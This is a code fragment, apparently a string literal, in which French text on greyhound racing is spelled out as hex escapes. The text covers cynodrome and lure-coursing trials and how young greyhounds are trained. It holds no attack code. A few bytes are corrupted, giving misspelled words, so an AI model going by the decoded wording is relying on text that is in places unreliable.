+"\x6d\x65\x20\x28\x45\x2e\x4e\x2e\x43\x20\x6f\x75\x20\x49\x2e\x54"
+"\x29\x20\x6f\x75\x20\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x70\x6f"
+"\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x76\x75\x65\x20\x73\x75"
+"\x72\x20\x6c\x65\x75\x72\x72\x65\x20\x28\x50\x2e\x56\x2e\x4c\x2e"
+"\x29\x20\x29\x20\x61\x67\x72\xe9\xe9\x73\x20\x70\x61\x72\x20\x6c"
+"\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61"
+"\x6c\x65\x20\x43\x61\x6e\x69\x6e\x65\x20\x65\x74\x20\x71\x75\x69"
+"\x20\x64\x69\x73\x70\x6f\x73\x65\x6e\x74\x20\x63\x68\x61\x63\x75"
+"\x6e\x20\x64\x27\x75\x6e\x20\x70\xe9\x72\x69\x6d\xe8\x74\x72\x65"
+"\x20\x64\x27\x61\x74\x74\x72\x69\x62\x75\x74\x69\x6f\x6e\x20\x70"
+"\x6f\x75\x72\x20\x6c\x61\x20\x64\xe9\x6c\x69\x76\x72\x61\x6e\x63"
+"\x65\x20\x64\x65\x73\x20\x42\x72\x65\x76\x65\x74\x73\x20\x64\x27"
+"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x78\x20\x43\x6f\x75"
+"\x72\x73\x65\x73\x20\x28\xbd\x2e\x41\x2e\x43\x2e\x19\x20\x6f\x75"
+"\x20\xe0\x20\x6c\x61\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20"
+"\xe0\x20\x56\x75\x65\x20\x28\x42\x2e\x50\x2e\x56\x2e\x29\x2e\x20"
+"\x4c\x27\x61\x64\x72\x65\x73\x73\x65\x20\x70\x65\x75\x74\x20\x76"
+"\x6f\x75\x73\x20\xea\x74\x72\x65\x20\x66\x6f\x75\x72\x6e\x69\x65"
+"\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20"
+"\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e\x61\x6c\x65"
+"\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x41\x73\x73\x6f\x63\x69"
+"\x61\x74\x69\x6f\x6e\x20\x73\x70\xe9\x63\x69\x61\x6c\x69\x73\xe9"
+"\x65\x20\x64\x65\x20\x52\x61\x63\x65\x2e\x0d\x53\x69\x20\x76\x6f"
+"\x75\x73\x20\x61\x64\x68\xe9\x72\x65\x7a\x20\xe0\x20\x75\x6e\x20"
+"\x63\x6c\x75\x62\x2c\x20\x76\x6f\x75\x73\x20\x72\x65\x63\x65\x76"
+"\x72\x65\x7a\x20\x74\x6f\x75\x74\x65\x73\x20\x6c\x65\x73\x20\x69"
+"\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73\x20\x75\x74\x69\x6c"
+"\x65\x73\x2e\x0d\x0d\x51\x75\x65\x6c\x6c\x65\x73\x20\xe9\x70\x72"
+"\x65\x75\x76\x65\x73\x20\x65\x78\x69\x73\x74\x65\x6e\x74\x20\x3f"
+"\x0d\x49\x6c\x20\x79\x20\x61\x20\x74\x72\x6f\x69\x73\x20\x73\x6f"
+"\x72\x74\x65\x73\x20\x64\x27\xe9\x70\x72\x65\x75\x76\x65\x73\x20"
+"\x3a\x0d\x0d\x31\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76"
+"\x65\x73\x20\x4e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73\x75"
+"\x72\x20\x43\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x20\x28\x45\x2e\x4e"
+"\x2e\x43\x2e\x29\x2e\x0d\x42\x61\x70\x74\x69\x73\xe9\x65\x73\x20"
+"\x63\x6f\x75\x72\x73\x65\x73\x20\x6f\x75\x20\x72\x61\x63\x69\x6e"
+"\x67\x20\x64\x61\x6e\x73\x20\x6e\x6f\x74\x72\x65\x20\x6a\x61\x72"
+"\x67\x6f\x6e\x20\x65\x6c\x6c\x65\x73\x20\x73\x65\x20\x64\xe9\x72"
+"\x6f\x75\x6c\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20\x63\x79"
+"\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20\xe9\x74\x61\x6c\x6f\x6e\x6e"
+"\xe9\x20\x70\x75\x69\x73\x20\x61\x67\x72\xe9\xe9\x20\x70\x61\x72"
+"\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4e"
+"\x61\x74\x69\x6f\x6e\x61\x6c\x65\x20\x64\x27\x55\x74\x69\x6c\x69"
+"\x73\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69"
+"\x65\x72\x73\x20\x64\x69\x74\x65\x22\x20\x43\x6f\x6d\x6d\x69\x73"
+"\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x22\x2e\x0d"
+"\x4c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x79\x20\x64\x69\x73"
+"\x70\x75\x74\x65\x20\x64\x27\x61\x62\x6f\x72\x64\x20\x75\x6e\x65"
+"\x20\x63\x6f\x75\x72\x73\x65\x20\x63\x6f\x6e\x74\x72\x65\x20\x6c"
+"\x61\x20\x6d\x6f\x6e\x74\x72\x65\x20\x64\x69\x74\x65\x20\x64\x65"
+"\x20\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x2c\x20"
+"\x61\x70\x70\x72\xe9\x63\x69\xe9\x65\x20\x70\x61\x72\x20\x72\x61"
+"\x70\x70\x6f\x72\x74\x20\xe0\x20\x75\x6e\x65\x20\x76\x69\x74\x65"
+"\x73\x73\x65\x20\x64\x65\x20\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65"
+"\x20\x28\x31\x30\x20\xe0\x20\x31\x35\x20\x6d\xe8\x74\x72\x65\x73"
+"\x20\x70\x61\x72\x20\x73\x65\x63\x6f\x6e\x64\x65\x73\x29\x20\x64"
+"\x69\x74\x65\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73"
+"\x65\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x61\x6c\x6f\x72\x73\x20"
+"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x3a\x20\x49\x6e\x74\x65"
+"\x72\x6e\x04\x74\x69\x6f\x6e\x61\x6c\x65\x2c\x20\x41\x2c\x20\x42"
+"\x2c\x20\x43\x2c\x20\x44\x2e\x0d\x45\x6e\x73\x75\x69\x74\x65\x20"
+"\x69\x6c\x20\x64\x69\x73\x70\x75\x74\x65\x20\x64\x65\x73\x20\x63"
+"\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63"
+"\x65\x20\x6f\xf9\x20\x69\x6c\x20\x61\x66\x66\x72\x6f\x6e\x74\x65"
+"\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73"
+"\x20\x64\x65\x20\x73\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65"
+"\x2e\x0d\x0d\x32\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76"
+"\x65\x73\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c"
+"\x65\x73\x2e\x20\x28\x49\x2e\x54\x29\x0d\x43\x65\x20\x73\x6f\x6e"
+"\x74\x20\x64\x65\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x69"
+"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73"
+"\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2e\x20\x45\x6c"
+"\x6c\x65\x73\x20\x73\x65\x20\x64\x69\x73\x70\x75\x74\x65\x6e\x74"
+"\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x2c\x20\x61\x70\x72"
+"\xe8\x73\x20\x73\xe9\x6c\x65\x63\x74\x69\x6f\x6e\x73\x20\x73\x6f"
+"\x69\x74\x20\x61\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x73\x6f\x69"
+"\x74\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\x65\x6e\x20"
+"\x73\xe9\x72\x69\x65\x73\x2e\x0d\x45\x6c\x6c\x65\x73\x20\x64\x69"
+"\x98\x66\xe8\x72\x65\x6e\x74\x20\x64\x65\x73\x20\x45\x2e\x4e\x2e"
+"\x43\x2e\x20\x70\x61\x72\x20\x6c\x61\x20\x72\xe9\x70\x61\x72\x74"
+"\x69\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x63\x61\x74\xe9\x67\x6f"
+"\x72\x69\x65\x73\x20\x65\x6e\x20\x6c\x27\x61\x62\x73\x65\x6e\x63"
+"\x65\x20\x64\x27\x75\x6e\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x69"
+"\x6d\x70\x6f\x73\xe9\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65"
+"\x2c\x20\x6d\x61\x69\x73\x20\x72\xe9\x75\x6e\x69\x73\x73\x65\x6e"
+"\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x65\x73\x20\x63\x6f"
+"\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x67\x72\x61"
+"\x6e\x64\x65\x20\x76\x61\x6c\x65\x75\x72\x2e\x0d\x0d\x33\x29\x20"
+"\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76\x65\x73\x20\x64\x65\x20"
+"\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x56\x75\x65\x20"
+"\x73\x75\x72\x20\x4c\x65\x75\x72\x72\x65\x20\x28\x45\x2e\x50\x2e"
+"\x56\x2e\x4c\x2e\x29\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x64\x65"
+"\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x64\x65\x75\x78"
+"\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2c\x20\x72\x61"
+"\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c\x27\x61\x70\x74\x69\x74\x75"
+"\x64\x65\x20\xe0\x20\x6c\x61\x20\x63\x68\x61\x73\x73\x65\x2e\x20"
+"\x4c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x6f\x75"
+"\x72\x73\x75\x69\x76\x65\x6e\x74\x20\x75\x6e\x20\x6c\x65\x75\x72"
+"\x72\x65\x20\x73\x75\x72\x20\x75\x6e\x20\x6c\x6f\x6e\x67\x20\x70"
+"\x61\x72\x63\x6f\x75\x72\x73\x20\x65\x6e\x20\x73\x6c\x61\x6c\x6f"
+"\x6d\x20\x63\x6f\x6d\x70\x72\x65\x6e\x61\x6e\x74\x20\x64\x65\x73"
+"\x20\x6f\x62\x73\x74\x61\x63\x6c\x65\x73\x20\x65\x74\x20\x70\x6c"
+"\x61\x63\xe9\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x6e\x61\x74\x75"
+"\x72\x65\x2e\x20\x43\x68\x61\x63\x75\x6e\x20\x65\x73\x74\x20\x6a"
+"\x75\x67\xe9\x20\x73\x75\x72\x20\x73\x6f\x6e\x20\x63\x6f\x6d\x70"
+"\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\xe0\x20\x70\x61\x72\x74\x69"
+"\x72\x20\x64\x65\x20\x73\x61\x20\x76\x69\x74\x65\x73\x73\x65\x2c"
+"\x20\x73\x61\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x63\x65\x2c\x20"
+"\x73\x6f\x6e\x20\x61\x72\x64\x65\x75\x72\x2c\x20\x73\x6f\x6e\x20"
+"\x61\x73\x74\x75\x63\x65\x2c\x20\x73\x6f\x6e\x20\x63\x6f\x75\x72"
+"\x61\x67\x65\x2c\x20\x65\x74\x20\x73\x6f\x6e\x20\x61\x72\x74\x20"
+"\x64\x65\x20\x63\x61\x70\x74\x75\x72\x65\x20\xe0\x20\x6c\x27\x61"
+"\x72\x72\x69\x76\x35\x65\x2e\x20\x41\x20\x6c\x27\xe9\x74\x72\x61"
+"\x6e\x67\x65\x72\x20\x6c\x65\x73\x20\x45\x2e\x50\x2e\x56\x2e\x4c"
+"\x2e\x20\x73\x6f\x6e\x74\x20\x61\x70\x70\x65\x6c\xe9\x65\x73\x20"
+"\x43\x6f\x75\x72\x73\x69\x6e\x67\x20\x65\x74\x20\x6c\x65\x20\x6a"
+"\x75\x67\x65\x6d\x65\x6e\x74\x20\x65\x73\x74\x20\x64\x69\x66\x66"
+"\xe9\x72\x65\x6e\x74\x2e\x0d\x0d\x51\x75\x61\x6e\x64\x20\x65\x74"
+"\x20\x63\x6f\x6d\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x6d\x65\x6e\x63"
+"\x65\x72\x20\x3f\x0d\x4c\x65\x20\x6a\x65\x75\x6e\x65\x20\x4c\xe9"
+"\x76\x72\x69\x65\x72\x20\x65\x73\x74\x20\x61\x6d\x65\x6e\xe9\x20"
+"\x61\x75\x20\x74\x65\x72\x72\x61\x69\x6e\x20\xe0\x20\x75\x6e\x20"
+"\xe2\x67\x65\x20\x63\x6f\x6d\x70\x72\x69\x73\x20\x67\xe9\x6e\xe9"
+"\x72\x61\x6c\x65\x6d\x65\x6e\x74\x20\x65\x6e\x74\x72\x65\x20\x36"
+"\x20\x6d\x6f\x69\x73\x20\x65\x74\x20\x31\x20\x61\x6e\x20\x73\x65"
+"\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x2e\x20\x49\x6c\x20"
+"\x64\x6f\x69\x74\x20\xea\x74\x72\x65\x20\x61\x73\x73\x65\x7a\x20"
+"\x6a\x65\x75\x6e\x65\x20\x70\x6f\x75\x72\x20\x71\x75\x65\x20\x6c"
+"\x27\x6f\x6e\x20\x70\x72\x6f\x66\x69\x74\x65\x20\x64\x65\x20\x73"
+"\x61\x20\x74\x65\x6e\x64\x61\x6e\x63\x65\x20\x6e\x61\x74\x75\x72"
+"\x65\x6c\x6c\x65\x20\xe0\x20\x6a\x6f\x75\x65\x72\x20\x65\x74\x20"
+"\x63\x6f\x75\x72\x69\x72\x20\x61\x70\x72\xe8\x73\x20\x75\x6e\x20"
+"\x6c\x65\x75\x72\x72\x65\x2c\x20\x6d\x61\x69\x73\x20\x61\x73\x73"
+"\x65\x7a\x20\x66\x6f\x72\x6d\xe9\x20\x70\x6f\x75\x72\x20\x6e\x65"
+"\x20\x70\x61\x73\x20\x72\x69\x73\x71\x75\x65\x72\x20\x64\x65\x20"
+"\x6c\x75\x69\x20\x61\x62\xee\x6d\x65\x72\x20\x6c\x65\x20\x73\x71"
+"\x75\x65\x6c\x65\x74\x74\x65\x20\x70\x61\x72\x20\x64\x65\x73\x20"
+"\x65\x72\x72\x65\x75\x72\x73\x20\x20\x64\x27\x65\x6e\x74\x72\x61"
+"\xee\x6e\x65\x6d\x65\x6e\x74\x2e\x20\x49\x6c\x20\x70\x6f\x75\x72"
+"\x72\x61\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20\xe0\x20\x63"
+"\x6f\x75\x72\x69\x72\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65"
+"\x6d\x65\x6e\x74\x20\x61\x70\x72\xe8\x73\x20\x31\x32\x20\x6f\x75"
+"\x20\x31\x35\x20\x6d\x6f\x69\x73\x20\x73\x65\x6c\x6f\x6e\x20\x6c"
+"\x61\x20\x72\x61\x63\x65\x2e\x20\x0d\x0d\x4c\x65\x20\x64\x72\x65"
+"\x73\x73\x61\x67\x65\x0d\x4f\x6e\x20\x63\x6f\x6d\x6d\x65\x6e\x63"
+"\x65\x20\x70\x61\x72\x20\x6c\x27\x68\x61\x62\x69\x74\x75\x65\x72"
+"\x20\x61\x75\x78\x20\x62\x72\x75\x69\x74\x73\x2c\x20\x61\x75\x78"
+"\x20\x61\x62\x6f\x69\x65\x6d\x65\x6e\x74\x73\x2c\x20\xe0\x20\x6c"
+"\x61\x20\x70\x72\xe9\x73\x65\x6e\x63\x65\x20\x64\x27\x61\x75\x74"
+"\x72\x65\x73\x20\x63\x68\x69\x65\x6e\x73\x2c\x20\x65\x74\x20\x63"
+"\x65\x6c\x61\x20\x70\x65\x75\x74\x20\x73\x65\x6e\x66\x61\x69\x72"
+"\x65\x20\x74\x72\xe8\x73\x20\x74\xf4\x74\x2e\x20\x0d\x50\x75\x69"
+"\x73\x20\x6f\x6e\x20\x6c\x75\x69\x20\x6d\x6f\x6e\x74\x72\x65\x20"
+"\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x6f\x6e\x20"
+"\x6c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x20\xe0\x20\x63\x6f"
+"\x75\x72\x69\x72\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x2e\x0d\x44"
+"\x27\x61\x75\x74\x72\x65\x73\x20\x70\x72\xe9\x66\xe8\x72\x65\x6e"
+"\x74\x20\x70\x6c\x61\x63\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72"
+"\x72\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x70\x6f\x75\x72"
+"\x20\x71\x75\x27\x69\x6c\x20\x70\x61\x73\x73\x65\x20\xe0\x20\x67"
+"\x72\x61\x6e\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65\x20\x64\x65"
+"\x76\x61\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20"
+"\x71\x75\x69\x20\x61\x20\x61\x6c\x6f\x72\x73\x20\x6c\x65\x20\x72"
+"\xe9\x66\x6c\x65\x78\x65\x20\x64\x65\x20\x70\x61\x72\x74\x69\x72"
+"\x20\xe0\x20\x73\x61\x20\x70\x6f\x75\x72\x73\x75\x69\x74\x65\x2e"
+"\x20\x49\x6c\x20\x65\x73\x74\x20\x70\x72\xe9\x66\xe9\x72\x61\x62"
+"\x6c\x65\x20\x64\x65\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20"
+"\x76\x65\x72\x73\x20\x6c\x61\x20\x66\x69\x6e\x20\x64\x75\x20\x70"
+"\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x6c\x65\x20\x70\x72\x6f\x70"
+"\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x73\x65\x20\x74\x65\x6e\x61"
+"\x6e\x74\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x65"
+"\x74\x20\x75\x6e\x20\x74\x69\x65\x72\x73\x20\x61\x6d\x65\x6e\x61"
+"\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x75"
+"\x20\x64\xe9\x70\x61\x72\x74\x2e\x20\x43\x6f\x6d\x6d\x65\x20\x63"
+"\x65\x6c\x61\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6d\x6f\x74"
+"\x69\x76\xe9\x20\xe0\x20\x6c\x61\x20\x66\x6f\x69\x73\x20\x70\x61"
+"\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x72"
+"\x65\x76\x65\x6e\x69\x72\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x75"
+"\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x71\x75"
+"\x69\x20\x64\x6f\x69\x74\x20\x6c\x65\x20\x66\xe9\x6c\x69\x63\x69"
+"\x74\x65\x72\x20\x62\x72\x75\x79\x61\x6d\x6d\x65\x6e\x74\x2e\x20"
+"\x50\x65\x75\x20\xe0\x20\x70\x65\x75\x2c\x20\x6f\x6e\x20\x61\x6c"
+"\x6c\x6f\x6e\x67\x65\x20\x6c\x61\x20\x64\x69\x73\x74\x61\x6e\x63"
+"\x65\x20\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x70\x61\x72\x63\x6f"
+"\x75\x72\x73\x20\x63\x6f\x6d\x70\x6c\x65\x74\x2e\x0d\x4d\x61\x69"
+"\x73\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69"
+"\x72\x20\x64\x65\x73\x20\x76\x61\x72\x69\x61\x6e\x74\x65\x73\x20"
+"\x6d\x75\x6c\x74\x69\x70\x6c\x65\x73\x20\x73\x65\x6c\x6f\x6e\x20"
+"\x6c\x65\x73\x20\x63\x6c\x75\x62\x73\x2e\x20\x43\x65\x72\x74\x61"
+"\x69\x6e\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x66\x6f\x6e"
+"\x74\x20\x6c\x65\x20\x74\x6f\x75\x72\x20\x63\x6f\x6d\x70\x6c\x65"
+"\x74\x20\x64\x27\x65\x6d\x62\x6c\xe9\x65\x2c\x20\x64\x27\x61\x75"
+"\x74\x72\x65\x73\x20\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20"
+"\x64\x27\x75\x6e\x20\x67\x72\x61\x6e\x64\x20\x61\x70\x70\x72\x65"
+"\x6e\x74\x69\x73\x73\x61\x67\x65\x2e\x20\x51\x75\x61\x6e\x64\x20"
+"\x69\x6c\x20\x63\x6f\x75\x72\x74\x20\x62\x69\x65\x6e\x20\x61\x75"
+"\x20\x6c\x65\x75\x72\x72\xbf\x2c\x20\x69\x6c\x20\x65\x73\x74\x20"
+"\x70\x72\xea\x74\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x2e\x56"
+"\x2e\x4c\x2e\x2e\x20\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x45\x2e"
+"\x4e\x2e\x43\x2e\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x61\x70"
+"\x70\x65\x6c\xe9\x65\x73\x20\x72\x61\x63\x69\x6e\x67\x2c\x20\x69"
+"\x6c\x20\x64\x6f\x69\x74\x20\x61\x66\x66\x72\x6f\x6e\x74\x65\x72"
+"\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20\x74\xe2\x63\x68\x65\x73"
+"\x20\x3a\x20\x4c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65"
+"\x20\xe0\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x72\x20\x6c\x61\x20"
+"\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x2c\x20\x6f\x62\x6c\x69\x67"
+"\x61\x74\x6f\x69\x72\x65\x20\x70\x6f\x75\x72\x20\xe9\x76\x69\x74"
+"\x65\x72\x20\x6c\x65\x73\x20\x62\x61\x74\x61\x69\x6c\x6c\x65\x73"
+"\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x70\x6f\x75"
+"\x72\x20\x6c\x61\x20\x63\x61\x70\x74\x75\x72\x65\x20\x64\x75\x20"
+"\x6c\x65\x75\x72\x72\x65\x2e\x20\x49\x6c\x20\x73\x75\x66\x66\x69"
+"\x74\x20\x64\x65\x20\x6c\x75\x69\x20\x6d\x65\x74\x74\x72\x65\x20"
+"\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x20\x61\x76\x61"
+"\x6e\x74\x20\x75\x6e\x20\x64\xe9\x70\x61\x72\x74\x20\x6f\x75\x20"
+"\x75\x6e\x65\x20\x70\x72\x6f\x6d\x65\x6e\x61\x64\x65\x2c\x20\x70"
+"\x6f\x75\x72\x20\x71\x75\x27\x69\x6c\x20\x61\x73\x73\x6f\x63\x69"
+"\x65\x20\x6a\x6f\x69\x65\x20\x65\x74\x20\x6d\x75\x73\x65\x6c\x69"
+"\xe8\x72\x65\x2e\x20\x43\x27\x65\x73\x74\x20\x61\x73\x73\x65\x7a"
+"\x20\x66\x61\x63\x69\x6c\x65\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70"
+"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72\x74\x69\x72\x20"
+"\x65\x6e\x20\x62\x6f\x69\x74\x65\x20\x3a\x20\x65\x6e\x74\x72\x65"
+"\x72\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x63\x61\x73\x65\x2c\x20"
+"\x61\x74\x74\x65\x6e\x64\x72\x65\x20\x6c\x27\x6f\x75\x76\x65\x72"
+"\x74\x75\x72\x65\x2c\x20\x62\x6f\x6e\x64\x69\x72\x2e\x20\x43\x27"
+"\x65\x73\x74\x20\x65\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x74"
+"\x72\xe8\x73\x20\x20\x66\x61\x63\x69\x6c\x65\x3b\x20\x70\x61\x72"
+"\x66\x6f\x69\x73\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x6c\x75\x69"
+"\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72"
+"\x74\x69\x72\x20\x64\x65\x73\x20\x62\x6f\x69\x74\x65\x73\x20\x6f"
+"\x75\x76\x65\x72\x74\x65\x73\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70"
+"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72"
+"\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x20\x63\x6f\x6e\x63"
+"\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x43\x27\x65\x73\x74\x20\x75"
+"\x6e\x20\x70\x6f\x69\x6e\x74\x20\x71\x75\x69\x20\x70\x65\x75\x74"
+"\x20\xea\x74\x72\x65\x20\x64\xe9\x6c\x69\x63\x61\x74\x2e\x20\x53"
+"\x69\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e\x27\x65"
+"\x73\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x6d\x6f\x74"
+"\x69\x76\xe9\x20\x61\x75\x20\x6c\x65\x75\x72\x72\x65\x2c\x20\x73"
+"\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\xe9\x74\xe9\x20"
+"\x74\x72\x6f\x70\x20\x70\x72\x65\x73\x73\xe9\x20\x64\x65\x20\x6c"
+"\x65\x20\x6d\x65\x74\x74\x72\x65\x20\x65\x6e\x20\x67\x72\x6f\x75"
+"\x70\x65\x20\x73\x61\x6e\x73\x20\x61\x74\x74\x65\x6e\x64\x72\x65"
+"\x20\x75\x6e\x20\x62\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65"
+"\x20\x65\x6e\x20\x73\x6f\x6c\x6f\x2c\x20\x76\x6f\x75\x73\x20\x61"
+"\x6c\x6c\xce\x7a\x20\x61\x75\x20\x64\x65\x76\x61\x6e\x74\x20\x64"
+"\x65\x20\x64\xe9\x73\x61\x67\x72\xe9\x6d\x65\x6e\x74\x73\x2e\x20"
+"\x49\x6c\x20\x76\x61\x20\x6a\x6f\x75\x65\x72\x20\xe0\x20\x62\x6f"
+"\x75\x73\x63\x75\x6c\x65\x72\x20\x6c\x65\x73\x20\x61\x75\x74\x72"
+"\x65\x73\x20\x28\x6f\x6e\x20\x64\x69\x74\x20\x71\x75\x27\x69\x6c"
+"\x20\x62\x6f\x75\x67\x65\x2c\x20\x71\x75\x27\x69\x6c\x20\x61\x74"
+"\x74\x61\x71\x75\x65\x29\x20\x63\x6f\x6d\x6d\x65\x20\x64\x65\x73"
+"\x20\x63\x68\x69\x6f\x74\x73\x20\x71\x75\x69\x20\x6a\x6f\x75\x65"
+"\x6e\x74\x20\x65\x6e\x73\x65\x6d\x62\x6c\x65\x2e\x20\x4f\x75\x20"
+"\x62\x69\x65\x6e\x20\x73\x69\x20\x6c\x65\x20\x6c\x65\x75\x72\x72"
+"\x65\x20\x6e\x27\x61\x20\x70\x61\x73\x20\xe9\x74\xe9\x20\x70\x6c"
+"\x61\x63\xe9\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20"
+"\x62\x6f\x69\x74\x65\x20\x63\x6f\x6d\x6d\x65\x20\x6c\x65\x20\x76"
+"\x65\x75\x74\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74"
+"\x2c\x20\x6c\x65\x73\x20\x36\x20\x20\x4c\xe9\x76\x72\x69\x65\x72"
+"\x73\x20\x76\x6f\x6e\x74\x20\x73\x65\x20\x70\x72\xe9\x63\x69\x70"
+"\x69\x74\x65\x72\x20\x76\x65\x72\x73\x20\x6c\x65\x20\x70\x6f\x69"
+"\x6e\x74\x20\x6f\xf9\x20\xe9\x74\x61\x69\x74\x20\x6c\x65\x20\x6c"
+"\x65\x75\x72\x72\x65\x2c\x20\x64\x27\x6f\xf9\x20\x62\x6f\x75\x73"
+"\x63\x75\x6c\x61\x64\x65\x2e\x0d\x44\x27\x61\x75\x74\x72\x65\x73"
+"\x20\x6e\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x6e\x74\x20\x70"
+"\x61\x73\x20\x64\x27\xea\x74\x72\x65\x20\x72\x61\x74\x74\x72\x61"
+"\x70\xe9\x73\x2c\x20\x6f\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9"
+"\x73\x20\x61\x75\x20\x74\x6f\x75\x72\x6e\x61\x6e\x74\x20\x3a\x20"
+"\x69\x6c\x73\x20\x73\x65\x20\x72\x65\x62\x69\x66\x66\x65\x6e\x74"
